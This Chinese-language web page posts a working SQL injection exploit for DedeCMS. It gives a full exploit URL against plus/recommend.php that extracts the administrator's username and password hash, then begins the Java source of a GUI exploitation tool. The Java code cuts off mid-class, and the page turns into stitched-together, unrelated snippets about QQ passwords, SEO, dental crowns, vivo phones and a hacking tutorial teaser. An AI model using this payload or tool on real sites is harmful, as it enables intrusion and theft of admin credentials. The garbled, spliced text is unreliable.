近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
EXP:
复制代码代码如下:
http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` 1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示
利用工具源码(by 园长):
复制代码代码如下:
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
在登录QQ的时候,发现输入的密码错误,或者压根就是忘记了,如图所示将会提示密码错误的信息框。遇到这样的情况时,通过点击登陆窗口旁边的“找回密码”或是。 除非专业的人士,不然一般都是破解不了的。 QQ密...
在很长一段时间里,你会发明本身操纵的SEO项目,一点起色都没有,迫于KPI的压力,于是就会有病乱投医,往往适得其反。 我们知道,任何一个事物都是动态的,SEO也不破例,算法险些天天都大概会调解,因此我...
因烤瓷牙材料太多,加之大部分消费者都不具备这方面的知道,因此在选择的时候就犯难了“我该做那种?会不会被骗?”,一些不法医疗机构就趁机以次充好,浑水摸鱼。今天小编就烤瓷牙的种类、优缺点及价格做详细介绍,...
日常企业办公,很多人会根据QQ开展联络,用以工作中交流讨论、收取和发送文档,有的人习惯性在闲聊对话框展现全部手机联系人,便于于立即查询信息。那麼那么问题来了,电脑上QQ怎样在闲聊对话框左边进行全部手机...
本文目录一览: 1、vivo手机链接免费WiFi是骗局 2、vivo手机真的可以检测病毒吗 3、vivo手机刷完机之后为什么还需要账号密码? 4、vivo手机被黑客远程监控锁屏了要收费才解...
菜鸟学习初级教程—–强烈推荐(看完后成黑客拉) 第一篇 看完的人10个有9个成了黑客 看完的人10个有9个成了黑客 还有一个是BC 然而看完的人 视力全下降1度 黑客的基本技能 1、黑...